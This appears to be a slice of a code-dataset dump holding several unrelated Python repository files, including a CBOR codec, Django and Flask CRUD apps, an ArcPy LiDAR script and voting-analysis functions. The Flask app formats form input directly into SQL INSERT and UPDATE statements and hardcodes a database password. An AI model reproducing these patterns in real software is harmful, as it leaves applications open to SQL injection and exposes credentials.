doesn't scale up\n item = ord(cbordec.read(1))\n count = item & 0x1F\n LOGGER.debug('AC with count %d', count)\n items = []\n for _ in range(count):\n items.append(self._decode_ari(cbordec))\n return items\n\n def _decode_obj(self, type_enum, cbordec):\n if type_enum == StructType.ARI:\n obj = self._decode_ari(cbordec)\n\n elif type_enum == StructType.AC:\n obj = AC(\n items=self._decode_ac_items(cbordec)\n )\n\n elif type_enum == StructType.EXPR:\n obj = EXPR(\n type_enum=StructType(cbordec.decode()),\n items=self._decode_ac_items(cbordec)\n )\n\n elif type_enum == StructType.TNVC:\n # FIXME: there is no distinction in text between AC and TNVC\n obj = AC(items=self._decode_tnvc(cbordec))\n\n elif type_enum in LITERAL_TYPES:\n item = cbordec.decode()\n obj = LiteralARI(type_enum=type_enum, value=item)\n\n else:\n raise ValueError(f'Unhandled param object type: {type_enum}')\n\n return obj\n\n\nclass Encoder:\n ''' The encoder portion of this CODEC. '''\n\n def encode(self, obj: ARI, buf: BinaryIO):\n ''' Encode an ARI into CBOR bytestring.\n\n :param obj: The ARI object to encode.\n :param buf: The buffer to write into.\n '''\n cborenc = cbor2.CBOREncoder(buf)\n self._encode_obj(obj, cborenc, True)\n\n def _encode_obj(self, obj, cborenc, as_ari):\n if isinstance(obj, ReferenceARI):\n self._encode_ref_ari(obj, cborenc)\n\n elif isinstance(obj, AC):\n # FIXME: workaorund! doesn't scale up\n head = bytes([0x80 | len(obj.items)])\n LOGGER.debug('AC encoding header %s', to_diag(head))\n cborenc.write(head)\n for ari in obj.items:\n self._encode_ref_ari(ari, cborenc)\n\n elif isinstance(obj, EXPR):\n cborenc.encode(obj.type_enum.value)\n # FIXME: workaorund! doesn't scale up\n head = bytes([0x80 | len(obj.items)])\n LOGGER.debug('EXPR encoding type %s, header %s',\n obj.type_enum.value, to_diag(head))\n cborenc.write(head)\n for ari in obj.items:\n self._encode_ref_ari(ari, cborenc)\n\n elif isinstance(obj, TNVC):\n self._encode_tnvc(obj.items, cborenc)\n\n elif isinstance(obj, LiteralARI):\n if obj.type_enum == StructType.BSTR:\n cborenc.encode(obj.value)\n return\n\n if as_ari:\n flags = (\n ((obj.type_enum - StructType.BOOL) << 4)\n | StructType.LIT\n )\n cborenc.write(struct.pack('!B', flags))\n cborenc.encode(obj.value)\n\n else:\n raise TypeError(f'Unhandled object type {type(obj)} for: {obj}')\n\n def _encode_ref_ari(self, obj, cborenc):\n flags = int(obj.ident.type_enum)\n if obj.ident.namespace is not None:\n flags |= AriFlag.HAS_NN\n if obj.params is not None:\n flags |= AriFlag.HAS_PARAMS\n if obj.ident.issuer is not None:\n flags |= AriFlag.HAS_ISS\n if obj.ident.tag is not None:\n flags |= AriFlag.HAS_TAG\n LOGGER.debug('ReferenceARI encoding flags %s', to_diag(flags))\n cborenc.write(struct.pack('!B', flags))\n\n if obj.ident.namespace is not None:\n cborenc.encode(obj.ident.namespace)\n \n # amp is expecting a bytestring\n cborenc.encode(\n obj.ident.name if isinstance(obj.ident.name, bytes)\n else str(obj.ident.name).encode('utf-8')\n )\n \n if obj.params is not None:\n self._encode_tnvc(obj.params, cborenc)\n if obj.ident.issuer is not None:\n cborenc.encode(obj.ident.issuer)\n if obj.ident.tag is not None:\n cborenc.encode(obj.ident.tag)\n\n def _encode_tnvc(self, params, cborenc):\n LOGGER.debug('TNVC encoding count %s', len(params))\n flags = 0\n if params:\n flags |= TnvcFlag.TYPE | TnvcFlag.VALUE\n cborenc.write(struct.pack('!B', flags))\n\n if flags:\n cborenc.encode(len(params))\n\n for param in params:\n if isinstance(param, ReferenceARI):\n type_enum = StructType.ARI\n 
elif isinstance(param, AC):\n type_enum = StructType.AC\n elif isinstance(param, EXPR):\n type_enum = StructType.EXPR\n elif isinstance(param, TNVC):\n type_enum = StructType.TNVC\n elif isinstance(param, LiteralARI):\n type_enum = param.type_enum\n else:\n LOGGER.warning(\n 'Unhandled parameter type %s for: %s',\n type(param), param\n )\n cborenc.write(struct.pack('!B', type_enum))\n\n for param in params:\n LOGGER.debug('TNVC encoding item %s', param)\n self._encode_obj(param, cborenc, as_ari=False)\n","repo_name":"NASA-AMMOS/anms-ace","sub_path":"src/ace/ari_cbor.py","file_name":"ari_cbor.py","file_ext":"py","file_size_in_byte":9699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27147653440","text":"import tensorflow as tf\n\n#Training: Load image, (semi randomly) augmentate the image and subtract per image mean and std\ndef _load_and_preprocess_image_train(image_path, label=None):\n\n image = image_path\n image = tf.io.read_file(image_path)\n image = tf.image.decode_png(image, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_flip_up_down(image)\n\n image = tf.image.per_image_standardization(image)\n \n if label == None:\n return image\n\n else:\n return image, label\n\n#Validation/Test: Load image and subtract per image mean and std\ndef _load_and_preprocess_image_test(image_path, label=None):\n\n image = image_path\n image = tf.io.read_file(image_path)\n image = tf.image.decode_png(image, channels=3)\n\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.per_image_standardization(image)\n \n if label == None:\n return image\n\n else:\n return image, label\n\n\n\n#This function generates the image batches\n#if shuffle is True: dataset will be shuffled before batching\n#if predict is True: dataset will not be repeated (important for the last batch in case of predicting the validation/test data)\ndef batch_dataset(dataset, batch_size, shuffle=True, predict=False):\n\n if shuffle == True:\n dataset = dataset.shuffle(buffer_size=20 * 1000 * batch_size)\n \n #For training: augmentate the images (random flip after loading)\n if predict == False:\n dataset = dataset.repeat()\n dataset = dataset.map(_load_and_preprocess_image_train, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n \n #For validation/test: No image augmentation upon creating the batch\n else:\n dataset = dataset.repeat(1)\n dataset = dataset.map(_load_and_preprocess_image_test, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\n #Create the batch and prefetch\n dataset = dataset.batch(batch_size)\n dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)\n \n return dataset\n","repo_name":"Ay-De/SLM-CNN","sub_path":"CNN/modules/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"2024048779","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Profesionales, Especialidades\nfrom django.contrib.auth.models import User\nfrom .forms import Profesionales_Form, Usuario_Form, Especialidades_Form\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\n# Create your views here.\n\ndef profesionales_lista(request):\n queryset = Profesionales.objects.all\n if request.user.is_authenticated():\n context = {\n \"title\": \"Mi 
lista de profesionales\",\n \"object_list\": queryset,\n }\n else:\n context = {\n \"title\": \"Lista / No logueado\"\n }\n return render(request, \"profesionales_lista.html\", context)\n\n\ndef profesionales_detalle(request, id):\n instancia = get_object_or_404(Profesionales, id=id)\n context = {\n \"instancia\": instancia,\n \"nombre\": instancia.Nombre,\n }\n return render(request, \"profesionales_detalle.html\", context)\n\ndef profesionales_crear(request):\n form = Profesionales_Form(request.POST or None)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Creado Exitosamente!\")\n return HttpResponseRedirect(instancia.get_url_lista())\n context = {\n \"form\": form,\n }\n return render(request, \"profesionales_form.html\", context)\n\n\ndef profesionales_edita(request, id):\n instancia = get_object_or_404(Profesionales,id=id)\n form = Profesionales_Form(request.POST or None, instance=instancia)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Profesional Actualizado!\")\n\n return HttpResponseRedirect(instancia.get_url_lista())\n context = {\n \"form\": form,\n \"instancia\": instancia,\n }\n\n return render(request, \"profesionales_editar_form.html\", context)\n\n\ndef profesionales_borrar(request, id=None):\n instancia = get_object_or_404(Profesionales, id=id)\n instancia.delete()\n messages.success(request, \"Profesional Borrado!\")\n\n return redirect(\"profesionales:lista\")\n\n\ndef especialidad_crear(request):\n form = Especialidades_Form(request.POST or None)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Creado Exitosamente!\")\n return HttpResponseRedirect(\"/profesionales\")\n context = {\n \"form\": form,\n }\n return render(request, \"especialidades_form.html\", context)\n","repo_name":"Naukas1/GIP_Final","sub_path":"GIP/Profesionales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21598242725","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.prev = None\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.start = None\n\n def display(self):\n current = self.start\n while current is not None:\n print(current.data)\n current = current.next\n\n def is_empty(self) -> bool:\n return not self.start\n\n def prepend(self, data):\n if not self.start:\n self.start = Node(data)\n return\n\n tmp_node = Node(data)\n tmp_node.next = self.start\n self.start.prev = tmp_node\n self.start = tmp_node\n\n def append(self, data):\n if not self.start:\n self.start = Node(data)\n return\n\n last = self.start\n while last.next is not None:\n last = last.next\n\n tmp_node = Node(data)\n last.next = tmp_node\n tmp_node.prev = last\n\n def insert_after(self, target_data, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == target_data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n tmp_node = Node(data)\n found_last = True if not found.next else False\n if found_last:\n found.next = tmp_node\n tmp_node.prev = found\n else:\n tmp_node.prev = found\n tmp_node.next = found.next\n found.next.prev = tmp_node\n found.next = tmp_node\n\n def insert_before(self, target_data, data):\n if 
self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == target_data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n tmp_node = Node(data)\n if found is self.start:\n self.prepend(data)\n else:\n tmp_node.next = found\n tmp_node.prev = found.prev\n found.prev.next = tmp_node\n found.prev = tmp_node\n\n def delete(self, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n if found is self.start:\n if found.next is None:\n self.start = None\n else:\n self.start = self.start.next\n return\n\n left, right = found.prev, found.next\n left.next = right\n right.prev = left\n\n\nlst = LinkedList()\nlst.append(3)\nlst.prepend(1)\nlst.insert_after(1, 2)\nlst.insert_before(1, 0)\nlst.insert_after(2, 100)\nlst.delete(2)\nlst.display()\n","repo_name":"TheArman/ooad_tasks","sub_path":"5_hmw/1_linked_list.py","file_name":"1_linked_list.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70141727210","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'Jocelyn!180'\napp.config['MYSQL_DB'] = 'shoe_store'\n\nmysql = MySQL(app)\n\n# while True:\n# #username = input(\"Enter username: \")\n# #password = input(\"Enter password: \")\n# try:\n# cnx = pymysql.connect(host='localhost', user='root', password='Jocelyn!180', db='shoe_store')\n# cur = cnx.cursor()\n# if cnx:\n# break\n# else:\n# continue\n# except:\n# print('Couldn\\'t connect to the server. 
Please enter credentials again.')\n#\n\n\n@app.route('/')\ndef ind():\n\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM employee\")\n data = cur.fetchall()\n cur.close()\n\n return render_template('index.html', employees = data)\n\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n if request.method == \"POST\":\n employee_id = request.form['employee_id']\n salary = request.form['salary']\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n start_date = request.form['start_date']\n branch_id = request.form['branch_id']\n job_title = request.form['job_title']\n\n cur = mysql.connection.cursor()\n\n ins_st = '''INSERT INTO employee (employee_id, salary, first_name, last_name,\n start_date, branch_id, job_title) VALUES ('{}', '{}', '{}', '{}', '{}','{}', '{}')'''.format(employee_id, salary, first_name, last_name, start_date, branch_id, job_title)\n print(ins_st)\n cur.execute(ins_st)\n\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\n@app.route('/update', methods= ['POST', 'GET'])\ndef update():\n if request.method == \"POST\":\n employee_id = request.form['employee_id']\n salary = request.form['salary']\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n start_date = request.form['start_date']\n branch_id = request.form['branch_id']\n job_title = request.form['job_title']\n\n cur = mysql.connection.cursor()\n\n ins_st = '''UPDATE employee SET salary='{}', first_name='{}', last_name='{}',\n start_date='{}', branch_id='{}', job_title='{}' \n WHERE employee_id='{}' '''.format(salary, first_name, last_name, start_date, branch_id, job_title, employee_id)\n cur.execute(ins_st)\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\n@app.route('/delete/', methods = ['POST', 'GET'] )\ndef delete(employee_id):\n\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM employee WHERE employee_id = %s\", [employee_id])\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\nif __name__ == \"__main__\":\n # had app.run(debug=True) before for debugging purposes.\n app.run()\n","repo_name":"kevingzheng/ShoeStoreDB","sub_path":"shoe_store_project/FlaskCrudApplication/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32235914907","text":"########################################################################################################################\n# File name: 2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py\n# Author: Mike Gough\n# Date created: 06/05/2023\n# Python Version: 3.x\n# Description:\n# Calculates the minimum bounding volume for a set of pre-processed LiDAR point returns.\n# Requires a fishnet with X,Y coordinates of the centroid (spatial join with fishnet labels), and a set of input points\n# with a z value and height_above_ground.\n########################################################################################################################\n\nimport arcpy\nimport math\narcpy.env.overwriteOutput = True\n\ninput_fishnet_with_xy = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Inputs\\Volume\\Vector_Fishnets.gdb\\Fishnet_LiDAR_Point_Extent_1_Tower_Location_For_Volume_Calculation_Join_XY\"\ninput_point_with_z = 
r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Intermediate\\Volume\\Volume.gdb\\Lidar_Points_with_Elevation_Extent_1_Tower_Location\"\nintersect_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Intermediate\\Volume\\Volume.gdb\\LiDAR_Points_with_X_Y_Z_Index\"\n\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_envelope\"\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_sphere\"\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_convex_hull\"\noutput_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_concave_hull\"\n\nprint(\"Intersecting Fishnet and Input Points\")\narcpy.Intersect_analysis([input_point_with_z, input_fishnet_with_xy], intersect_fc, \"ALL\")\narcpy.AddField_management(intersect_fc, \"Z_Index\")\n\nprint(\"Removing ground points. Adding integer based Z-Index\")\nwith arcpy.da.UpdateCursor(intersect_fc, [\"Z_Max\", \"height_from_ground\", \"Z_Index\"]) as uc:\n for row in uc:\n z_index = math.floor(row[1])\n if z_index == 0:\n uc.deleteRow()\n else:\n row[2] = z_index\n uc.updateRow(row)\n\n# Notes: Sphere creates volumes that extend beyond the 3D cubes.\narcpy.ddd.MinimumBoundingVolume(intersect_fc, \"Z_Max\", output_fc, \"CONCAVE_HULL\", \"LIST\", \"POINT_X;POINT_Y;Z_Index\", \"MBV_FIELDS\")\n\narcpy.AddField_management(output_fc, \"MBV_Percent\", \"DOUBLE\")\n\nwith arcpy.da.UpdateCursor(output_fc, [\"MBV_Volume\", \"MBV_Percent\"]) as uc:\n for row in uc:\n volumetric_percent = row[0] / 1 * 100\n row[1] = volumetric_percent\n uc.updateRow(row)\n\n\n\n","repo_name":"consbio/CALFIRE-Decision-support-system-2021-Wind","sub_path":"2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py","file_name":"2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30656699262","text":"import tensorflow # 딥러닝\nimport numpy as np # 수치계산\nimport cv2 # opencv2\nimport pyautogui # 마우스 x, y 좌표 확인용\nimport time # 시간 사용\n\nWINDOW_NAME = 'plasticBottleHelper'\ncheck_screen = 1 # 1: 카메라 화면, 2: 라벨 X, 3: 라벨 O\nprev_time = 0\nFPS = 10\nprediction_value = 0.98\n\n# 모델 위치\nmodel_filename = '/plasticBottleHelper/converted_keras/keras_model.h5'\nimg_filename1 = '/plasticBottleHelper/image1.png'\nimg_filename2 = '/plasticBottleHelper/image2.png'\n\n# 케라스 모델 가져오기\nmodel = tensorflow.keras.models.load_model(model_filename)\n\n# 카메라를 제어할 수 있는 객체\n# 외부 웹캠으로 비디오 캡처 초기화\ncapture = cv2.VideoCapture(1)\n# 외부 웹캠이 없다면 내장 웹캠을 사용\nif not capture.read()[0]:\n capture = cv2.VideoCapture(0)\n\n# Full screen mode\ncv2.namedWindow(WINDOW_NAME, cv2.WINDOW_NORMAL)\ncv2.setWindowProperty(WINDOW_NAME, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n# 마우스 이벤트\ndef mouse_event(event, x, y, flags, param): \n global check_screen\n \n if event == cv2.EVENT_LBUTTONDOWN:\n if (check_screen != 1) & (1280 < X < 2515) & (1140 < Y < 1412):\n check_screen = 1\n\nwhile True:\n # 프레임 계산 10fps\n current_time = time.time() - prev_time\n \n if check_screen == 1:\n # 비디오를 한 프레임씩 읽기\n ret, frame = capture.read()\n if not ret:\n break\n\n # 비디오 좌우 반전\n # frame = cv2.flip(frame, 1)\n # 비디오 상하 
반전\n # frame = cv2.flip(frame, 0)\n\n # 비디오 크기 재설정\n frame_resize = frame[:, 80:80+frame.shape[0]]\n frame_input = cv2.resize(frame_resize, (224, 224))\n\n frame_input = cv2.cvtColor(frame_input, cv2.COLOR_BGR2RGB)\n frame_input = (frame_input.astype(np.float32) / 127.0) - 1\n frame_input = np.expand_dims(frame_input, axis=0)\n\n prediction = model.predict(frame_input)\n \n cv2.rectangle(frame, (80, 0), (80+frame.shape[0], frame.shape[0]), (0, 0, 255), 5)\n cv2.putText(frame, str(round(prediction[0, 0], 5)), (10, 30), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, str(round(prediction[0, 1], 5)), (10, 50), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, str(round(prediction[0, 2], 5)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n \n else:\n X, Y = pyautogui.position()\n H, W = frame.shape[:2]\n \n if check_screen == 2:\n frame = cv2.imread(img_filename1)\n else: # if check_screen == 3:\n frame = cv2.imread(img_filename2)\n \n # 버튼 \n cv2.setMouseCallback(WINDOW_NAME, mouse_event, frame)\n cv2.putText(frame, \"X : \" + str(X), (10, 30), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"Y : \" + str(Y), (10, 50), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"H : \" + str(H), (10, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"W : \" + str(W), (10, 90), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n\n # 종료 버튼 0xFF == 64bit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n check_screen = 1\n\n if(prediction[0, 0] > prediction[0, 1]):\n if (prediction[0, 0] > prediction_value):\n check_screen = 2\n prediction[0, 0] = 0\n prediction[0, 1] = 0\n\n if(prediction[0, 1] > prediction[0, 0]):\n if (prediction[0, 1] > prediction_value):\n check_screen = 3\n prediction[0, 0] = 0\n prediction[0, 1] = 0\n\n # 출력\n if (ret is True) & (current_time > 1./ FPS) :\n prev_time = time.time()\n cv2.imshow(WINDOW_NAME, frame)\n\n# 비디오 캡처 개체 해제\ncapture.release()\ncv2.destroyAllWindows()","repo_name":"mikwain09/plastic_bottle_helper","sub_path":"plastic_bottle_helper.py","file_name":"plastic_bottle_helper.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33207814597","text":"import psycopg2\nimport os\nfrom Connection import Connection\nimport urllib.parse as up\n\n\nclass ElephantConnection(Connection):\n\n def __init__(self):\n super().__init__()\n\n def connect(self):\n try:\n\n # read connection parameters\n params = self.config(section='elephantsql')\n\n up.uses_netloc.append(\"postgres\")\n super().conn = psycopg2.connect(\n database=params['database'],\n user=params['user'],\n password=params['password'],\n host=params['host'],\n port=params['port']\n )\n print('Connect to the PostgreSQL on ElephantSQL successfully')\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n","repo_name":"chirunnuj/python-database-tutorial","sub_path":"ElephantConnection.py","file_name":"ElephantConnection.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"166286422","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 28 15:50:57 2020\n\n@author: darac\n\"\"\"\nimport random\nimport networkx as nx\nimport csv\nimport os\nimport shutil\nfrom functools import partial\nimport json\nimport math\nimport numpy as np\nimport geopandas as gpd\nimport matplotlib\n# matplotlib.use('Agg')\nimport seaborn as sns\nimport matplotlib.pyplot 
as plt\nimport matplotlib.ticker as ticker\nimport pandas as pd\nimport collections\nfrom enum import Enum\nimport re\nimport scipy\nfrom scipy import stats\nimport time\nimport heapq\nimport operator\n\n\n# modification of https://github.com/mggg/VRA_ensembles/TX/run_functions.py\n\n\nDIR = ''\n\n\ndef precompute_state_weights(num_districts, elec_sets, elec_set_dict, recency_W1, EI_statewide, primary_elecs, \\\n runoff_elecs, elec_match_dict, min_cand_weights_dict, cand_race_dict):\n \"\"\"\n Returns election weights for state and equal scores for Black, Latino and Neither\n effectivness. Election weights are the same across districts for these scores, as they \n use statewide candidate preferences (and all weights = 1 for the equal score). It also returns\n dataframes of statewide Latino and Black-preferred candidates in primaries and runoffs.\n \"\"\"\n black_pref_cands_prim_state = pd.DataFrame(columns=range(num_districts))\n black_pref_cands_prim_state[\"Election Set\"] = elec_sets\n hisp_pref_cands_prim_state = pd.DataFrame(columns=range(num_districts))\n hisp_pref_cands_prim_state[\"Election Set\"] = elec_sets\n black_pref_cands_runoffs_state = pd.DataFrame(columns=range(num_districts))\n black_pref_cands_runoffs_state[\"Election Set\"] = elec_sets\n hisp_pref_cands_runoffs_state = pd.DataFrame(columns=range(num_districts))\n hisp_pref_cands_runoffs_state[\"Election Set\"] = elec_sets\n\n black_ei_prob = [EI_statewide.loc[((EI_statewide[\"Election\"] == elec_set_dict[elec_set]['Primary']) & \\\n (EI_statewide[\"Demog\"] == 'BCVAP')), \"prob\"].values[0] \\\n for elec_set in elec_sets]\n\n black_ei_conf = [prob_conf_conversion(x) for x in black_ei_prob]\n black_conf_W3_state = np.tile(black_ei_conf, (num_districts, 1)).transpose()\n\n hisp_ei_prob = [EI_statewide.loc[((EI_statewide[\"Election\"] == elec_set_dict[elec_set]['Primary']) &\n (EI_statewide[\"Demog\"] == 'HCVAP')), \"prob\"].values[0]\n for elec_set in elec_sets]\n\n hisp_ei_conf = [prob_conf_conversion(x) for x in hisp_ei_prob]\n hisp_conf_W3_state = np.tile(hisp_ei_conf, (num_districts, 1)).transpose()\n\n neither_ei_conf = [prob_conf_conversion(x * y) for x, y in zip(black_ei_prob, hisp_ei_prob)]\n neither_conf_W3_state = np.tile(neither_ei_conf, (num_districts, 1)).transpose()\n\n # pre-compute W2 and W3 for statewide/equal modes\n for elec in primary_elecs + runoff_elecs:\n black_pref_cand = \\\n EI_statewide.loc[((EI_statewide[\"Election\"] == elec) & (EI_statewide[\"Demog\"] == 'BCVAP')), \"Candidate\"].values[\n 0]\n hisp_pref_cand = \\\n EI_statewide.loc[((EI_statewide[\"Election\"] == elec) & (EI_statewide[\"Demog\"] == 'HCVAP')), \"Candidate\"].values[\n 0]\n\n for district in range(num_districts):\n if elec in primary_elecs:\n black_pref_cands_prim_state.at[\n black_pref_cands_prim_state[\"Election Set\"] == elec_match_dict[elec], district] = black_pref_cand\n hisp_pref_cands_prim_state.at[\n hisp_pref_cands_prim_state[\"Election Set\"] == elec_match_dict[elec], district] = hisp_pref_cand\n\n else:\n black_pref_cands_runoffs_state.at[\n black_pref_cands_runoffs_state[\"Election Set\"] == elec_match_dict[elec], district] = black_pref_cand\n hisp_pref_cands_runoffs_state.at[\n hisp_pref_cands_runoffs_state[\"Election Set\"] == elec_match_dict[elec], district] = hisp_pref_cand\n\n min_cand_black_W2_state, min_cand_hisp_W2_state, min_cand_neither_W2_state = compute_W2(elec_sets, \\\n range(num_districts),\n min_cand_weights_dict,\n black_pref_cands_prim_state,\n hisp_pref_cands_prim_state,\n cand_race_dict)\n\n # 
compute final election weights (for statewide and equal scores) by taking product of W1, W2,\n # and W3 for each election set and district #Note: because these are statewide weights,\n # an election set will have the same weight across districts\n black_weight_state = recency_W1 * min_cand_black_W2_state * black_conf_W3_state\n hisp_weight_state = recency_W1 * min_cand_hisp_W2_state * hisp_conf_W3_state\n neither_weight_state = recency_W1 * min_cand_neither_W2_state * neither_conf_W3_state\n\n # equal-score weights are all 1\n black_weight_equal = np.ones((len(elec_sets), num_districts))\n hisp_weight_equal = np.ones((len(elec_sets), num_districts))\n neither_weight_equal = np.ones((len(elec_sets), num_districts))\n\n return black_weight_state, hisp_weight_state, neither_weight_state, black_weight_equal, \\\n hisp_weight_equal, neither_weight_equal, black_pref_cands_prim_state, hisp_pref_cands_prim_state, \\\n black_pref_cands_runoffs_state, hisp_pref_cands_runoffs_state\n\n\ndef compute_district_weights(dist_changes, elec_sets, elec_set_dict, state_gdf, partition, prec_draws_outcomes, \\\n geo_id, primary_elecs, runoff_elecs, elec_match_dict, bases, outcomes, \\\n recency_W1, cand_race_dict, min_cand_weights_dict):\n \"\"\"\n Returns election weights for the district score for Black, Latino and Neither\n effectiveness. Election weights differ across districts, as it uses district-specific preferred\n candidates. It also returns dataframes of district-specific\n Latino and Black-preferred candidates in primaries and runoffs.\n \"\"\"\n\n black_pref_cands_prim_dist = pd.DataFrame(columns=dist_changes)\n black_pref_cands_prim_dist[\"Election Set\"] = elec_sets\n hisp_pref_cands_prim_dist = pd.DataFrame(columns=dist_changes)\n hisp_pref_cands_prim_dist[\"Election Set\"] = elec_sets\n # store runoff preferences for instances where minority-preferred candidate needs to switch between primary and runoff\n black_pref_cands_runoffs_dist = pd.DataFrame(columns=dist_changes)\n black_pref_cands_runoffs_dist[\"Election Set\"] = elec_sets\n hisp_pref_cands_runoffs_dist = pd.DataFrame(columns=dist_changes)\n hisp_pref_cands_runoffs_dist[\"Election Set\"] = elec_sets\n\n black_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n hisp_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n neither_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n\n for district in dist_changes:\n state_gdf[\"New Map\"] = state_gdf.index.map(dict(partition.assignment))\n dist_prec_list = list(state_gdf[state_gdf[\"New Map\"] == district][geo_id])\n dist_prec_indices = state_gdf.index[state_gdf[geo_id].isin(dist_prec_list)].tolist()\n district_support_all = cand_pref_outcome_sum(prec_draws_outcomes, dist_prec_indices, bases, outcomes)\n\n black_pref_prob_single_dist = []\n hisp_pref_prob_single_dist = []\n\n for elec_set in elec_sets:\n HCVAP_support_elec = district_support_all[('HCVAP', elec_set_dict[elec_set]['Primary'])]\n hisp_pref_cand_dist = max(HCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n hisp_pref_prob_dist = HCVAP_support_elec[hisp_pref_cand_dist]\n hisp_pref_prob_single_dist.append(hisp_pref_prob_dist)\n\n BCVAP_support_elec = district_support_all[('BCVAP', elec_set_dict[elec_set]['Primary'])]\n black_pref_cand_dist = max(BCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n black_pref_prob_dist = BCVAP_support_elec[black_pref_cand_dist]\n black_pref_prob_single_dist.append(black_pref_prob_dist)\n\n black_pref_cands_prim_dist.at[\n black_pref_cands_prim_dist[\"Election Set\"] == elec_set, 
